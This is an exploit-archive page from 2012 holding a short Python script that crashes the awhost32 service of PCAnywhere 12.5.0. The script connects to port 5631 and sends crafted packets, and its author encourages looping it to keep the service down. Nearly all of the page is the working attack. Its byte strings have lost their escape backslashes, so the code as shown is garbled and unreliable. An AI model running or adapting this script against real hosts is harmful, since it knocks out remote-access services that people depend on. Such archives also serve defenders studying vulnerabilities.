[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : PCAnywhere 12.5.0 build 463 Denial of Service
# Published : 2012-02-17
# Author :
# Previous Title : Free Mp3 Player 1.0 Local Denial of Service Vulnerability
# Next Title : PeerBlock 1.1 BSOD
#!/usr/bin/python
'''
Exploit Title: PCAnywhere Nuke
Date: 2/16/12
Author: Johnathan Norman spoofy <at> exploitscience.org or @spoofyroot
Version: PCAnyWhere (12.5.0 build 463) and below
Tested on: Windows
Description: The following code will crash the awhost32 service. It'll be respawned
so if you want to be a real pain you'll need to loop this.. my inital impressions
are that controlling execuction will be a pain.
'''
import sys
import socket
import argparse
if len(sys.argv) != 2:
print "[+] Usage: ./pcNuke.py <HOST>"
sys.exit(1)
HOST = sys.argv[1]
PORT = 5631
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
# HELLO!
s.send("x00x00x00x00")
buf = s.recv(1024)
# ACK!
s.send("x6fx06xfe")
buf = s.recv(1024)
# Auth capability part 1
s.send("x6fx62xffx09x00x07x00x00x01xffx00x00x07x00")
# Auth capability part 2
s.send("x6fx62xffx09x00x07x00x00x01xffx00x00x07x00")